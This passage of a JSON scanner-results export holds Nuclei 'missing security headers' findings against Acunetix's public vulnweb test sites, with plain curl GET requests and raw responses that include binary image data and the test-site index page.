��A�q�\u0019�Ρy�i��;^\u0013�4�8\u001f}}a|\u0012�\\Zu���\u0015\u001eP���±�\u0004�\u0006�//_\f�OC��\u0014KP�Xa/�j�!F\u0007k8;�@%x$`�Rx�_U\n��b��I\u0005E\u001c��%1�8�;����`����\u0007:Ww��L��rF�P{;8�����u'���\\::�b\u00163G�B�!;Ӎ�\u001caW����<\u000fa�$�`s���+䦪Ji�\u0018\u0012Aߌ+.\u001d_��\u0005P��]X\u0001��6�Z�8�\u001eK�\u0018D\u0019c�\u0018\u001a�����k��[o4O\u0015nk[����}ƚ�}�7u�Ĵ3H��M�7q&��*����N\u0007��p�ա�w�q���~�\u0001�~���=��E�锳�|��Lnp�\\3$\u000e���1����\n��;�B����(b�G�8c�\u0001vg,Ac�\u0013$�\u0005�J^�^=����ϝ\nu+�QG:\u0019B\f\u001c�#��΄�`q\u0012��M�\u0013[[�C�x�]��\u00158�4F:s\u0013"���RRT�y ���|���R�3��\u0002��ܮ}\u0011=ʎ\u0016���(bhi`H�\u0011\u0005";\u0011F�I�\n�?0b��:z�=L�4ҁ�\b�\u0001G\u0007�}������<���\u001c`t�?�8�X\u001bN�$/�[Vt�<\u001c���imS�@er�C\f\u0011�\fu\u0005������B��v�C�8� �8� ��D��uC�Z�H�s\t��Ͼ|\u0018�>O�\b\u001e��� ��\u0016�\u001d\u001c�!�>(*�Vl�PϲX�gqHӘ�]��\t\f��6L\u001cn8q.\u0015A\u0018!���5����'���\u0013�\u0016\u0013\u0006\u0014�9`�\u0005\b;9\u0007$�\u0003�hJ��ӳ�I�u=]\u0015X\u0002�\f�\u000b�'�T�_<����\u0001l��̴\u00157\u001b|�!�Id�\u0015-\u0018��w+6_�\u000b����|���jJ:��r�,\f���L\u001d�����5\u0015%W\r�\u0013��p5$�\u0016�iHऎ\u0018c\u0011"q�\fs�~�\u001f�����{�(\n1��7\u001c}��mH�ީ�\u000f�2f�i=��L�������a���2F�\f$esɩ�yt�\u0007����w\u001d7��\u0003g��':ނ�Ls�Uq\t#`@ �}KsƸK�5�j\u0016��i�@�].\u0004sȒƵ\u0012\f���퐟�p��\u0004����d\u0012\u0015��*�t�U�Lf�a\u0006A\u0002\u0017S\u001b�;�������\f0q�\u0005�u���_P6ᐰ#�\n��\u0011�\b��\u0013[)�p����KOz��r��\u0006p�$���r��[y��M;\u001ao�4���!f, /�ع^\u0010�`�\u0005\u0001ƢuM/P��%���L��1H���e�5��&с�(]��!G\u0003R:�\u0014J\t��4��e�y���%�\u000e���|g\u0019�\u0001$�~f�=Uj�u\u0015�Jj��AQG:�-c���������\u000eq��#��ˑ����~r0s��˷n�����l�s1���GIw�\u0012CW\u0004���v�s�G\u001c\u00022\u000e\b������sQQ\f��\u001dE-<2"��� �eV��q��9��r\u0018����0�Xk�\u0006����\u0014J�u��\u000e��\n2�\u001d��2.\u0014r@<x�k=MT߄\u0012,P��,-Q\u001a�r��=L1�p`s���x�=�hk�#9#ӧ�\n�C�'�f�>�h��%���^mv��K�]R�5=��;>%œ�8\u001bO,7z�g蹵%ud�2=�R:�w�D\u0011�\u0013�\u0017n���\u00047<�\f�\u001b�AƑ��Aq�|=���-p\\j\u0016&�U\u0003d����X�0US\u0019l`\u0005*��g\u0015���x��!�����\u0014HY���9�\u000f��og�k�6��8;��&�Vq�#ܕ�����z��T�9q\u0018\nN�p\u0007�Q��-\u0018��\u001aeK�B\u000f ����\u0017d.*Ȱ�U=��M|���i�A&�0ʮ��A\r�O>x��\u000f �r�^����b��i]c�!M嘜\u0001�;� \u0001�<�3_QJ�j�\b\u0012/y�Ā(p�,�W\fW!q�\u0004z��Ƞ��e�\u0011�_Qr��Ă\u001bz%E<�����Gc�S\u0012�|����3��)�"�{\twq���㺴�����̍ÇM5�׺�@����V�m��\u0019dd��d��!]��)��%Gd�\u0017h݃��wr���{b�jƪ\tQOH#\u0005�y�1���7�p\u0014��\u0017\frqik�K=m<�co����r�\u0015��ͶH"pCD���\u0013��@*FA\u0019:�q��\u001c��Qx�?��JcV���~�&U�\u0018�\u001e�ަ%@!�\u0018k���TD̐5\u001d����[��(��;���\u001b}�.VO̩%�\u0013��B���\b+�FőNH��\u001c0�:9��CGM\u001c\u0014�G\u0014(X�"�\u0001>O�p�>p��4\u0003C%e��=\u0015E��FD�1��ң\u0010��Xn�Y\u0018\u0016![,U�쓫UCMM\u001b�m\u0013\u0011����ŞA;\u0004��q��(\u001fh�t\u000e�G��t��\n�\u001b?���� �~���\u0007��eH\u0016\u0015!�\u001c�rc��"eo���׌�����\f!)\u000eO��\u001b�ttQ��p\fq�#2�Ԝ\u0003�\u0007?��[���5]Z�Dp��6KHi�F�����d k�C��\u000bURW%1h�f�0LNHʹ\u0005pp�[$\u00128�1�����4k4k\ftp�Q�j\u0014\u0006\u0005���\u0004d�b>��涁d1\u0019^I;_/u�`�U�Ͼ�PO�(\u001eڪ�Sb'\n9�\u001a����;�Q�\u001bco�V��(�o.�`\u001e�砺��=\u001bU4�_s���̴�0H�`�]�%�ڛd9\u001e��ǖ�jΣ�{���%m��$��Mٍ�i�A�~�\u0007 ��g!��+����X��G'|�L��\u0015�U5��F\u0019��8���^K\u0013C̣-9�m\u0015<w\u0010�\u0019��{���|A�Z��qhb��X)��V.�\n$��V��>�Ab����3���m����Z�����h�H�ե��nL��!M���#:=�-Cp4��V��e�d��\u0004��$�]�9\f�\u0001�<c\u001ccZGZOWm����Ve���5c*&��O�n�9<����5΢�ݣ9\u0019�����MyBQ�wY�w�*\f\u0001fWڏ\u000e��\u0012��\u0019�8]�a\u0019\u0004��\u001fQ[SU���\u001c\u0014�ћ\\Tp\\.\u0017j�V���!\u000b\u0012�QcUe-�d����P;����E4d�)h��3���� \u0012\u0001ǶH��uk}ɵ-.����gO��7;G���-ӿs�N�VDA\u0019ld�J�2$\u0003��p���7U.�Y%��Z%�����e�\u0003~>V%X��'����\u0018%z�WM;F�v\u001f�����é����}?UCp�[�vj�Tn��~�ɂ�F1����O,t��q�\b��Ϗ�T��m��8;��+A�KUl�W$�{c�;��ȩj'W\u0006\u0005A�\u001bҪIS���<��\rc\u0015\u0015�_���qV\u001d�aI6\u000e��]�\r�U���\n�[WY]h�J��m��WYd�����J�(��Q\u0013v��@_�Q��s�ܱ��5��A\u0007b��9h�+$�UWA�Hm�GX�\u0003\u0003f�ƒ��Y%����.'\u0019=3���\u0015E�����\u0001���r��A�x^E���@'����\u001af\u001bF��6��@�<�",c��J)c�!|\f�g�\u0001���%�\u000f��m!xo��\\���9���<U���<�\r��OG\u0019�D�3�F|�i�*������.�\r\u001fv��X;��h{���\\\u0005]�rJ���<�:����D�;!��"�v�z�V+����O�V���xRV=Ѝ�\u0004��D���j��\u0015$�M��:\u0003�T���ۜ��[;�\u0010IfR�N\u000b\u001e[�\u0006p<h�)�#Ս\u000fo|�\u0010e:�|�\u0011��c��\u0010�}�uf�\fq�������-Mgj&bx\u0003?MA��e\f$�H$\u001c4r.�S�y\u0007�\u001f��t�\u0007�:�c�yo\u0018\u001a\u0005"��\u001b��5c�����z\u000e\u000f��Е\\�T��[N��;��*�i��U�e�$c �yʰP��[\u00168��\u0014\u0014o�<=\u0013�SG\u001f\f�3�\u0002|ꅪ袞W��Zр�;�\u001e\u0018{6>d?�\u0006\u001b����}_��Y\u001fn�R�H\u0003,sQwx`;\u001dH �\u0018��\u0004{\u001d\u0015^�n���vJ�=\u001a\u001b�D��2mٖ*@E\u0001�*\fP\u0007�F2F�nW8�\f' �d\u001d��m���o\u0017Q�[t\u000f�j���e\u0013R�OGN�ݎ�\u0011\u001231J�!US�2\b��r\t'ZM��Yx��d\u0011��W�Y�*e_F\u0019\u0015��h��K\u0002���Iпº�T\r;�f���Q+�������;{{�g�\u00060�c�t۽eB[n]�I��Pc\u000b\u0018\u0007\u0001pp\u000f�\b9����\u0005d�\u0013?��\u0001��s��׿�4T�������|J��\u001a��\u0015�6���i\u0016)���\u0001e��rB�\u0007��\f\u0002\u00179\u0004\u0003�z:���G/e@���Z��j��=\u00038P?P��>\u0017\u001bpwj��\u0015l7\u001b\u001d�\u000b�(��\u0011\u0011hX�����\u001f(\r�b\u0014��\u0017\u0019k��m���r��jAFn�R1�R�!�=�n�h-�8�=@s����5��7G�����P5\u0014�Ԟ'\u0015�ݮL�)G }�I֫���g\u0002��\u0005��cC\u0015K�d�Ͼ>�i�'v͏��\f�\t��#w_���:k$��ֺ���I\u0017a@\f�͂�\u0001l�2�3�S����������4v0��02����\u0001$\u001e��ާ���ʐq�*L�\\\u0005{DP�Wi��V�*AK��ʛ�-$S�L�5�\b��I\u0004\u000f\u001c�e���,��X2�����#`\u001c��[`>��`��1*�{��1b\u0014�T����\u0004�G�\f[�����4�Y]�E\u0010�!��\n���\u000f��\u0015\u001c��\b��\u000bE(���q�<���Γ<#\u0019E���\u0007�՜S}1�\u001d\bQ�IRf\u0014�\n�K�y�\u0010��0��\b\u0018��d��8��3�u�H��\u00063"�\u001e�\u0004�G�\f\t\u0007�i�U�9�����*-ҵ��\r\u0011\u0014�q���-ܳ��R\u00179S�X�A�\u0006\u001c0#ʌ�FG�A��\u001fC�B��c�kl��0��\u0015��:\u0019\u0003۸U�3Av�]��Z�yv���0dm�\t\u0001���v.p\u0006\\~ڕOr�E���\t)��\u001b�\t$\u001b{�=���8\u0005�ό�y\u0007T�N�P!�z��V�gJh���ul*�KnU���\u0003#E6n���\u001b\u0005'P\\\u001e��S\u00075�,�;�\u001d��[i,\u00102���n�s�LUܤ�J8��\u001d���'��a��_\u0017\u0017\u000e\u001c��W�Q\u0006J�<-�Q����pA��\u0011��t��\u001a�����U���\u0012\u001aVffyQQ1�A\u0019Q��C`�DղR,]�Y�,^'ĉ\u001dJ+�,>W��Xd`�\u001c\u0010u��1��Id���As5MJ�:KT�+\u0018�f�-�,��x�q��[�]���������^�Z�K�����B��<�p�.�\u0012���\u0003�q�\u0019��0H`\t*qQ]++J�K$/,f)\fNW��ʶ<��<k���N�ʉ(�\u001a�\u0001-+2��8ǥW�1��H,I$�\u001d\\�mt�+�2K<�����X��\u001fՖl�����^��bi�n�[@b���"n���Ώ���<���EZU�t\u0010�\u0015,��WԹQ�F\t<`6���\u0010��K��l\u0014��̴��B���Ű�s�� ��ƾ|���])^��\t���7Ԏ\u0007k��|��9\u001e�\u0007�g�/�3T��2PR��[䥑��z��L\u0018��W�!�eJg#\u0007��u�\n|\u00170\u0002�~�_Ң�s���'��QY��n\u001f���J��\f��%cR\u0017�@,Wv|��G,�?X�kii�\u0015@��a}��G!,P\f�\u000f|�\t<\u0003�h{�� ��f\ti��2��2����\u001c��X�\u001c�\u001fvÝہ\u0019\u0007X���i���\n���m E,���dv�\u0017R0�\u0001�\f��\f���E%��4�\u0001g\u001e#l\u001f��DI8n���i���?m�D�l�U�\u001dxl6<��\u001f�\u000f��+���� !�x�⎵�\u0005�^�c�\u0013hR\u000eO��,Ř�\\�9ZZ��1��du\tU\u001b�$�>�����3h�j��\u0015�\fdp]\u0002'���\u0019S���8\u0004k@�ė��q\\n۪�\u0019e�Y\u001d�QZF$�\u000e\t��'?3\u000f\u0007\u001aZZAZ��\u0018�\f\u001e>���d����z��\u001b?Kt�[��~k\u000b�U������j1�`\r���\u001f�`\n1#,x\u0007KKU\u0016�L\u001cG|��O^>0\u0017���S$K;�����6bU\u0001bH\u0003<d��\u0016P�r�\u0018�\u001aZZmnF\bJn��aL.����RQ�Ϩl�5\u000f"�S_\u0005;��kly\u0002�\u000f�\u0007Ζ���$S���\u0003B\u0001��U_\r�puWX��wf��&\f�,m���-��\u0002F\u000e9ǂ5�X�d��\u000e��鈒�A\u0014i\u0014O�,\u000b\u0014;���ң��Ϝaik�{@���\t��\n���N�%��IGE\u0005������\u0018鷡U%�\t\\�\fĐ���\u0007�A9ڸ1�J����ui_RgM�Yʾ\u000fv#��r}M�?1�x��֩>*Fqk���9�E��T�5L��\u001bܖ8\u0018\u0019Ή�\u0016��A�6x�j��\u0013ԤNar��\u0010\b�A������w\u000f\u000f�\u0011�:�\u0007�hi\u001a�4��)�nW\n�i�a$B\u0002E6\u001dP�\u0003��d���i\u0005���D�T�(�\u0019\u000b�\u000br�P��@��\u001f�KK\\�W��X3տ�՟#�VY���C\u001d\u0002�v;�U��\f�HwaDn���1������m��VR�\u0013;,Ԑ�6�\u000e\u0019�$\u000e<iij���LM\u0005.��+��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 991, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/8.jpg.tn", + "discovered_date": "2024-11-13T02:42:45.929Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/8.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4139\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nEtag: "4dca64a1-102b"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0003\u0004\u0005\u0001\u0007\b��;\u0010\u0001\u0003\u0002\u0004\u0002\u0006\b\u0005\u0004\u0002\u0003\u0001\u0002\u0003\u0011\u0004\u0005\u0012!1AQ\u0006\u0013"aq�\u00142T�����$B���\u0015#3�Rb4r���\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007��(\u0011\u0002\u0001\u0003\u0003\u0004\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011!\u0004\u00141\u0005\u0012AQ\u0013\u0015"B2ab���\f\u0003\u0001\u0002\u0011\u0003\u0011?�S�K��@�\u001bU\u0010z�~\u001d*D���@e��\u0012+�oQ��Vߩ�}I�����{9%L�Oy\u0014ÃX�z�?��h�"2��0\u000f�5ޤѺ�\u000bU��Z|\f���vv�����\u0003)����i��R���Eã�o�t\u001f\u0014\nc�5�uB�\u000fq����\u001b���t�H�)�l\u0007�� N\u0015{\u001e�\u0003�U]�7\u0012`�\tM��aT��h�k�-&\u001el)=�\u0002�F\u0013k��\u0018���W6��$��S��u�\u000ey�eQ��\u0015�I9g��\u0017�0$�\u0015��56\f�m��#�����N�Oq�����Ʋh|���I/2\u001a,-���$w\u001d~uE�[ ������V�����"<�H�\f��;�\u0015R+.A��G.F\u0018K\u0003vTڞ�e\u0013��>�\u0002p\u0007`�_�:�\u0018\u0002�0A�ދ�C�\\!�\u001eJ�����\n�H�U+Z�wQkXBS�m�\u0014װ�3B�Ȏ\u0019������+J7�\t��hI���\u0016j\u0003�G΋��{C?\u0018�\u0013`6�d��3�=s��`��(�ȟ3�����\u001b'��wཥ��W\u0005�M|b��\u001fW<ظ\u0007�\t�\u0015Q�����\u001e%?J3�\u000f�����[\u000e7\f�b�օt� 3�.\u0006���趹\u001f����FYl=���R�a�\f�B���YO�\u001f���C_:i��ײ��FY,=���R�a�\f�b���YO�\u0012�\u0007�e@Gq�Յ�&G���[\u000fhg�\u0014�X{C?\u0018��\u0019t� \u00118j�\u0012�\u0011�jSa;2G�\u0013F�,=���Rɇ�C?\u0018��#��`8�ZOe$yԨ�RwfO2h�%��3��Yp�hg�\u00147�}6��\u0010\f(��\u001esK��De\u0003�Q�\u0016#k�~1K�^���(oE��~��0����OvSL\u00188V�\bO�@��{K_\u0018�E��埌Q�1�NH�\u001c��� M������\u0013���;W$�ӷ�\r�\rZ�$;m�c(\n�T\u0001�I�4��~��Ņ�׽z\u0016�\u0014 \u0001�E�$�xk\u001bl8p�ϨR�\b�\u001d-Ŵ;���L!��V\u0016�\u0002�+�\u0003��\u001f|�u��b\bk�.:�\b�LƁZ�Ѓ�X���h/���.B�eH))!! H�!;lg�0▪E�}P}�(���)#(%[\u001d���YWQ�J�.���]��b/\u0007\u0002\u001cs�@P$����M����\u0012�SM�^\u000e-A\t܉�G\u0018�\u0016��o\u001crԼ�E�u�+*���F�.���V��˶�\u001a��-#+�7\u0004J\u0013�a\u001a� ��\u0002$M\tu\u0019���;e��Yx�(�6\u001c�!\u0004�Y���\u000e����b��\fN�\u0019E�n��#�m��9���H1�\u001f��ڠ��Ɉ���[j\u0015�!�0��\u0003\u0007�&"\u000e�j)�8��Iq�f��}��\b\n'|����Y+7r�J\u0017�7�I�U~�����Gajȩ�>`x��Ķ��8��6�]:P�FE�+*Q�\u0012F�\u00065\u0010�Tq�C\u0007yƔ��\u0010��\u0011�=��\u0019'�y�v�l�p�_\fqn+�]����$q\u001eQ�?\u001aYW����\u000fd}\u001a��q7\u0015��۔��\u0004��\t\u0002\u000f\u00025\u001ae\u001cF���8�$�\u0016��\\C\u0004f��2�\b�\u001a�5\u0011���\u0002��î[�KL�խh%N\u0013�h�\u0004�\u001c\u0001o:�d[�]�Y\\��бd�W(\u0005��\u0003S�\t�\u0013��Ũ�{�\u0013�<X4��1\u000b��,ߘ\u0004���\u0012��<9H��4�X��\r�p]Y�\u0003�\u0019"7�Q�\u0015�/�ww�u,\\:۩�\b�*ˤ�7\u0018���o�����`k�\u001a]��mEJ%Dd��"gS���\u0013�=\n�he��1%J/\u0016\u000bn�Q�۾�\u001fq�<م$�j�=.�R�/�S�hO\u000e�\u0012�$��������Ze'e\r9@�֯�ݦ'���\u0012P\u0014�\u001c���se��\u0003A��jZ�����-4�Y\u001bk����r�TBGorv\u001bӏK���}I\u0003i\\��7��0���T�\u00044�k�\u001d�$��;N\u0013vm\u0014���ܘ�Gw\u0012|\u0006��������\u0005�\n�.�p�t����r�皤\u001d0�*���\u001d�SC\u0016WV�o�9�|��C���J���C"4���\u0013R�v�.��\u0019�\u001bG��VHL\u0002\u0006i�\u0006����ޒ]B\nV�\u0019i�l�β�F\u0012\u001ce���Ќ�@\u000e�>\u0014��\u0016�YԄ�ⳒN�����x�\u0016�u���\u0010BB�\u001c�T���\u001c7�4.����x�(�V\bB3��6�غ��/�\u0012îu��$�W]@�����\u0016�a͵�4\u0014\u001a�\u001ey�\n@�'��\f�\u0004F��\u000e\u001a�{���ܦ�(��Fl���*ݻ*��T\u0014����Q�*\u0007�\u0006i�"���\u0010�t���!qw��ݷ�>�\t�cI\u0011��Y�[\u00168��-\u0015t�>��P�ҳ\u0015&`(�\u001a��üP-���1��H\u001dA=��ӕ\u0016٭�p�mՙ�tR\u0002���\u000f�w���8G)\u0007�K�]N4�Wn�\u0010�\u0003,�\fs\u0007]�3"^HPK�F�H\u001a�p�oDNa]K�2��HP\b��y�}��U�,57=Z�n��1\u0019c�����U�\u0016\u0001c\n͉�\u0016���U��\b��Jں��j���\u000e��B\u000bn%3\u0005�F�{ֵ�\u001bl\bB\u0019lI��))H��\u0003a�\u001d��S\\�n\u001dYm$+)�刐 �\f\r�����u'��0��Ҝ�i!JP�,L�\u0001\u001aL��\u001fJ�|�,p�KRB^t\u0005����h;�j�Ͳ�ԧs��H�V��m�\u0001�����C8�,�!���;�bg:�\u0004�5�\u0018\u001a��.�\u001e����[�\u0002oqE�\u0013n��R\u001a �\u0002x}k�z\u0011�3��\nn��9n\u0002V�$���Q׈\u0002I܃�y& �\\�T��F�L@\u001e\u0002���^\u001e�k�u���D\u0018��+�^��\u0004�\u0019\u0013�Y�\u0015��\u001b[莩�ħi�\u000f�:���c�<\u000b�6\u0014d�*$����L��]�\tm����\u0002\u000e�R��b���)& ������q�@��]���U��2r�)L�����,=�ш\u000b�”�܅(\t��\u0015�\u0004�?:1w\u0017��ZP��%\t�`(���D��.� �q��!��Q���Y�w+��\u0012�,)X�a`6�\u0018��*x�1\u0014K�Z��\u0007�z�,��HS\u0004�)\u0006\f�G\u0001 ���\u0018��ıD���*ԭZ7��\u0015��\\=\t’�R-���\u0010]�h��]~T��e(Ő\u0005�p���\u0004\u0003�\u001a�*+2kZ�\u0015ZD\u0014\b�YB9V�p\u0002L�Ԥ��IWn��\u0016��m&@��L�37\u001a��RX)YЂ)�� \tN\u001eop�/�R��\u000eGF�DhF�6:�M2ѻ�[��\u0001SZ\u0012�Ǻ�C�Akv��Q\r�\u0018:�H��D*]�U�H\n�II\u0013\u001bH\u001e\u0015�nQn-`(����G\u0010�\u0013�v��\u000e����5a\u0017�D����u���x�\by���\u0002#��\u001bT��J�z�\u0007Q��c_�Y%L(%o\u0010hu�7\tZb\u0012�"u��H�Tn\\�ܽVT\u0015+�\n�\u0012\u000e��X�踸jє�\u001a�~�뫺ZD���c0\u0004\u001f�W�d.��Iq3m`��c9\u0019\u001bo��Y>C���-�%���d����'X'�O��[��n�ajNl��\u0001������f�:V��ʄ'a�km$�\u001e��S\u0002�y�\u0015\u0003A�_€a�.�\u0001�!#���J�I�N�����g �Guk�q`\u0010��-�/1\n'y��/4�25\u0006x�\u0014��\u0010u�\u001ba�`%:�G\u00045�3j��H8��\u0004��PU�'¶1|=~��[Z\u0003-���:�y���\u001d\u0012e-\u0002�$�� \rD�υ[�R�c\r-)!\u000f9�W08\b�|�\u0014�7VȄX&(ղ�s\u0002\b%*�\u001fޝ�\\e\u0018��Wn���O>:���&�\n\u001c$fȭ��@�\u0002� (F�)�˽Ir\u0017$�٣qg\n��\u0019�\u001b����T�\f\u001f�\u001c�6�����(��'.i�׉�����ʙ�;q��S���FRM�J�R\t�\u001b�\u001fÊ�*���0EJ���� \u000eU�\u0002�\tY�䟥[w�\n�Ӑ�P��W\t5��6�\u0001eAGI\u001a\u0011�UD)eq$�w�|�VR\u0012�\b�t"L�Ƅ��\t�ڛ��L�s\u001e4�|��\u0001\u0001�\u0001���J�2�G7*����&\u000e�\nT��<\u0012����vaCj����*p��\u001b�#�TEڒ������M\u000f=�B�'bi�)?\u00029�y-�.V���\u0004�́���]�:�\u0015��4����rgi֚�\u001f��U��:xҚ\u0007�\u0012�p�У�S�\rj�M���\u0006�x\u0011�R�O�uQ<�Y�\u0014��J�O}3�Q�懲\u0015�ҖH\u0003��L٥e!*�xD�a\t#:\t���J�\u0010��\u001c��&*�)"�(ˆ\u0014aL\u000b\u001bR��\u001a�\u0010A(<x��P�J�Uqrd�5#6�'�Z\r::��\u0010L�sN���"��w��²z�m*�4�7&\u0016gp5=��R��*A�P����h��ي�ՙ�*%i@$�`i�k!�!S\u001a�|�ҥ\\�\u000e��$\u0014�\u0002t�j\u00022�@m R�W�1f̤�����\u0017�\u0012��p��J�\bԵ(�cz������iR�PV�\f�y%m���\u001fqS%\u00031\u001e?*T�>E\u0011\u00039\u0011�>�j�\t�>�R�Q\u0001�N�\u0014�z�@ޕ*Ҹ2ˑ�\u00026\u001bTKBH:R�Q�\u001c[I))\u0012\u0007q�LI\u0001\u000f\u00109q�J���j��4���P��\\P\u0011=��Uf���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 992, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 112, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'", + "type": "http", + "http_url": "http://www.vulnweb.com", + "discovered_date": "2024-11-13T02:42:46.266Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: www.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n 